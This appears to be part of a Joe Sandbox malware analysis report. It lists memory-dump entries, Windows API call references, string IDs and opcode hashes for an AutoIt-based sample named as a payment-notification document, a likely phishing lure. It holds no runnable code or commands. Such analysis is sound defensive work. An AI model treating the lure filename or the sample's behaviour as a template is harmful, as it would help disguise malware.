                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                              • Instruction ID: 7857858ad71205456a06a1a1ed3ce8677d37f37a63773dbf273a268d27715a8e
                                                                              • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                              • Instruction Fuzzy Hash: B39188736080A34EDB2D463E857407EFFE55A923A171A0B9EE4F2CB1C5FE24D954D620
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                              • Instruction ID: 894d6014a41ed6f5b8b824972b495a2900cfe312b22cf8259b05d7bdc605518f
                                                                              • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                              • Instruction Fuzzy Hash: 369176722090E34EDB6D427E957403EFFE95A923A231A079ED4F2CB1C5FE24C564D620
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 690b1dc8ca980446072509a38990e47d954621cf7e6fd6413ca9ec63b49648a6
                                                                              • Instruction ID: 7809dbed4cf1475479144a77622f231daaff9d0cf89150fa8e990b3fff2f9825
                                                                              • Opcode Fuzzy Hash: 690b1dc8ca980446072509a38990e47d954621cf7e6fd6413ca9ec63b49648a6
                                                                              • Instruction Fuzzy Hash: 0C613661F087496EEA3499E88895BBFF39DDF81730F100D19E882DB2C1DA55BE428365
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9210601fd4e3e4295fd8baa945192d569b0518e72f07ec974a657771114194b3
                                                                              • Instruction ID: 69c78567bdb2fbd40bd00c8560327e3bf1f13af0da00840dc927335a8a98c2e2
                                                                              • Opcode Fuzzy Hash: 9210601fd4e3e4295fd8baa945192d569b0518e72f07ec974a657771114194b3
                                                                              • Instruction Fuzzy Hash: E7615971F087096EDE385AE88855BBFE39CAF82730F100D59E982DB2D1DA16FD42C255
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                              • Instruction ID: b4cc6623a777d3776d18d2ca0b1832df52332deff328eb822471304fd61a192f
                                                                              • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                              • Instruction Fuzzy Hash: 8C8185376090A34EDB6D827A857443EFFE55E923A131A479ED4F2CB1C1FE24C658E620
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8945e522d5600e98cf80aec810fdc7950b8d7c9a632eac8869fab957e69c3c71
                                                                              • Instruction ID: ad99e3284b31fbb06e28d3c583134be1a701b128d1f7111752937f79e3a107fb
                                                                              • Opcode Fuzzy Hash: 8945e522d5600e98cf80aec810fdc7950b8d7c9a632eac8869fab957e69c3c71
                                                                              • Instruction Fuzzy Hash: 5C21A8326216158BD728CF79C91267E73E5E754320F15862EE4A7C77D0DE35A904D740
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00962B30
                                                                              • DeleteObject.GDI32(00000000), ref: 00962B43
                                                                              • DestroyWindow.USER32 ref: 00962B52
                                                                              • GetDesktopWindow.USER32 ref: 00962B6D
                                                                              • GetWindowRect.USER32(00000000), ref: 00962B74
                                                                              • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00962CA3
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00962CB1
                                                                              • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962CF8
                                                                              • GetClientRect.USER32(00000000,?), ref: 00962D04
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00962D40
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D62
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D75
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D80
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00962D89
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962D98
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00962DA1
                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962DA8
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00962DB3
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962DC5
                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0097FC38,00000000), ref: 00962DDB
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00962DEB
                                                                              • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00962E11
                                                                              • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00962E30
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00962E52
                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0096303F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 2211948467-2373415609
                                                                              • Opcode ID: 9500cdacdcd28e8c1619db602ddb6372b86007d6f8f52a6f16dfc2f07dcfb152
                                                                              • Instruction ID: 09c3e7fbf53c1db45e2c07387f5ed62b3ef6950428cd30aaf7d459ec6b821b94
                                                                              • Opcode Fuzzy Hash: 9500cdacdcd28e8c1619db602ddb6372b86007d6f8f52a6f16dfc2f07dcfb152
                                                                              • Instruction Fuzzy Hash: 5C027DB2610205EFDB14DF64CD89EAE7BB9FB49710F048158F919AB2A1DB34ED40DB60
                                                                              APIs
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0097712F
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00977160
                                                                              • GetSysColor.USER32(0000000F), ref: 0097716C
                                                                              • SetBkColor.GDI32(?,000000FF), ref: 00977186
                                                                              • SelectObject.GDI32(?,?), ref: 00977195
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 009771C0
                                                                              • GetSysColor.USER32(00000010), ref: 009771C8
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 009771CF
                                                                              • FrameRect.USER32(?,?,00000000), ref: 009771DE
                                                                              • DeleteObject.GDI32(00000000), ref: 009771E5
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00977230
                                                                              • FillRect.USER32(?,?,?), ref: 00977262
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00977284
                                                                                • Part of subcall function 009773E8: GetSysColor.USER32(00000012), ref: 00977421
                                                                                • Part of subcall function 009773E8: SetTextColor.GDI32(?,?), ref: 00977425
                                                                                • Part of subcall function 009773E8: GetSysColorBrush.USER32(0000000F), ref: 0097743B
                                                                                • Part of subcall function 009773E8: GetSysColor.USER32(0000000F), ref: 00977446
                                                                                • Part of subcall function 009773E8: GetSysColor.USER32(00000011), ref: 00977463
                                                                                • Part of subcall function 009773E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00977471
                                                                                • Part of subcall function 009773E8: SelectObject.GDI32(?,00000000), ref: 00977482
                                                                                • Part of subcall function 009773E8: SetBkColor.GDI32(?,00000000), ref: 0097748B
                                                                                • Part of subcall function 009773E8: SelectObject.GDI32(?,?), ref: 00977498
                                                                                • Part of subcall function 009773E8: InflateRect.USER32(?,000000FF,000000FF), ref: 009774B7
                                                                                • Part of subcall function 009773E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009774CE
                                                                                • Part of subcall function 009773E8: GetWindowLongW.USER32(00000000,000000F0), ref: 009774DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                              • String ID:
                                                                              • API String ID: 4124339563-0
                                                                              • Opcode ID: 15cb74ccba2e6e214bf336c5b8bd0832d6322d201ece2afe784f33b09f0374c8
                                                                              • Instruction ID: 7fbee90d0adae358e43c66eccaa4323688a77bdb3516368b07b4a846cfa2256e
                                                                              • Opcode Fuzzy Hash: 15cb74ccba2e6e214bf336c5b8bd0832d6322d201ece2afe784f33b09f0374c8
                                                                              • Instruction Fuzzy Hash: 2AA1B2B311C301AFD7009F60DC48A6BBBA9FF49321F104A1DF96A961E1D735E984DB51
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?), ref: 008F8E14
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00936AC5
                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00936AFE
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00936F43
                                                                                • Part of subcall function 008F8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008F8BE8,?,00000000,?,?,?,?,008F8BBA,00000000,?), ref: 008F8FC5
                                                                              • SendMessageW.USER32(?,00001053), ref: 00936F7F
                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00936F96
                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FAC
                                                                              • ImageList_Destroy.COMCTL32(00000000,?), ref: 00936FB7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                              • String ID: 0
                                                                              • API String ID: 2760611726-4108050209
                                                                              • Opcode ID: 707cbdb4247b2ebdadb2e490ad3cd5eb83c7ab63e75b7c66c83de32e89501ed9
                                                                              • Instruction ID: 4693afc5f38a6d3c56cb042bdaf3a54ea8522481b3309862b3a4ee09977e7d75
                                                                              • Opcode Fuzzy Hash: 707cbdb4247b2ebdadb2e490ad3cd5eb83c7ab63e75b7c66c83de32e89501ed9
                                                                              • Instruction Fuzzy Hash: C912CA31208245EFDB25CF28D994BBABBF9FB44310F548529F589CB261CB31A891DF91
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 0096273E
                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0096286A
                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 009628A9
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 009628B9
                                                                              • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00962900
                                                                              • GetClientRect.USER32(00000000,?), ref: 0096290C
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00962955
                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00962964
                                                                              • GetStockObject.GDI32(00000011), ref: 00962974
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00962978
                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00962988
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00962991
                                                                              • DeleteDC.GDI32(00000000), ref: 0096299A
                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 009629C6
                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 009629DD
                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00962A1D
                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00962A31
                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00962A42
                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00962A77
                                                                              • GetStockObject.GDI32(00000011), ref: 00962A82
                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00962A8D
                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00962A97
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                              • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                              • API String ID: 2910397461-517079104
                                                                              • Opcode ID: 1811478c2344cb3871b3051033a91c8cc8af60ece5434984d0e9f2d5ec64b007
                                                                              • Instruction ID: 1ecb5c8e5d7fa4fdfb82a6d167e185347ea7558916943651a2e3247c88b34db4
                                                                              • Opcode Fuzzy Hash: 1811478c2344cb3871b3051033a91c8cc8af60ece5434984d0e9f2d5ec64b007
                                                                              • Instruction Fuzzy Hash: 6FB16DB2A10615AFEB14DF68DD89FAE7BB9FB49710F108118F915E7290D770AD40CBA0
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 00954AED
                                                                              • GetDriveTypeW.KERNEL32(?,0097CB68,?,\\.\,0097CC08), ref: 00954BCA
                                                                              • SetErrorMode.KERNEL32(00000000,0097CB68,?,\\.\,0097CC08), ref: 00954D36
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$DriveType
                                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                              • API String ID: 2907320926-4222207086
                                                                              • Opcode ID: 51510189bd0062ade82b2bfecf1c0f7fd8266d6c0724d463d08366bd35e9ef6f
                                                                              • Instruction ID: 204e3f8e6ef38387dbed9f088b8bf57ba302712d44fe1c084d5ae10e089c6d83
                                                                              • Opcode Fuzzy Hash: 51510189bd0062ade82b2bfecf1c0f7fd8266d6c0724d463d08366bd35e9ef6f
                                                                              • Instruction Fuzzy Hash: 1A61D530605205ABCB54DF2AC981DAC77B4EBC634EB288415FC46EB291DB35EDC9DB81
                                                                              APIs
                                                                              • GetSysColor.USER32(00000012), ref: 00977421
                                                                              • SetTextColor.GDI32(?,?), ref: 00977425
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0097743B
                                                                              • GetSysColor.USER32(0000000F), ref: 00977446
                                                                              • CreateSolidBrush.GDI32(?), ref: 0097744B
                                                                              • GetSysColor.USER32(00000011), ref: 00977463
                                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00977471
                                                                              • SelectObject.GDI32(?,00000000), ref: 00977482
                                                                              • SetBkColor.GDI32(?,00000000), ref: 0097748B
                                                                              • SelectObject.GDI32(?,?), ref: 00977498
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 009774B7
                                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 009774CE
                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 009774DB
                                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0097752A
                                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00977554
                                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00977572
                                                                              • DrawFocusRect.USER32(?,?), ref: 0097757D
                                                                              • GetSysColor.USER32(00000011), ref: 0097758E
                                                                              • SetTextColor.GDI32(?,00000000), ref: 00977596
                                                                              • DrawTextW.USER32(?,009770F5,000000FF,?,00000000), ref: 009775A8
                                                                              • SelectObject.GDI32(?,?), ref: 009775BF
                                                                              • DeleteObject.GDI32(?), ref: 009775CA
                                                                              • SelectObject.GDI32(?,?), ref: 009775D0
                                                                              • DeleteObject.GDI32(?), ref: 009775D5
                                                                              • SetTextColor.GDI32(?,?), ref: 009775DB
                                                                              • SetBkColor.GDI32(?,?), ref: 009775E5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 1996641542-0
                                                                              • Opcode ID: 1543f4260273205284cbd7f747b37c3f39f4ef6073006e142bb78e29c502d77d
                                                                              • Instruction ID: 85ab2c2a4837e12d7e9ba3b448dd95d679a9328868464cd18542de8c308dcb5c
                                                                              • Opcode Fuzzy Hash: 1543f4260273205284cbd7f747b37c3f39f4ef6073006e142bb78e29c502d77d
                                                                              • Instruction Fuzzy Hash: 3B6153B3908218AFDF019FA4DC49AAEBF79EF08320F114525F919A72A1D7759980DF90
                                                                              APIs
                                                                              • GetCursorPos.USER32(?), ref: 00971128
                                                                              • GetDesktopWindow.USER32 ref: 0097113D
                                                                              • GetWindowRect.USER32(00000000), ref: 00971144
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00971199
                                                                              • DestroyWindow.USER32(?), ref: 009711B9
                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 009711ED
                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0097120B
                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0097121D
                                                                              • SendMessageW.USER32(00000000,00000421,?,?), ref: 00971232
                                                                              • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00971245
                                                                              • IsWindowVisible.USER32(00000000), ref: 009712A1
                                                                              • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 009712BC
                                                                              • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 009712D0
                                                                              • GetWindowRect.USER32(00000000,?), ref: 009712E8
                                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 0097130E
                                                                              • GetMonitorInfoW.USER32(00000000,?), ref: 00971328
                                                                              • CopyRect.USER32(?,?), ref: 0097133F
                                                                              • SendMessageW.USER32(00000000,00000412,00000000), ref: 009713AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
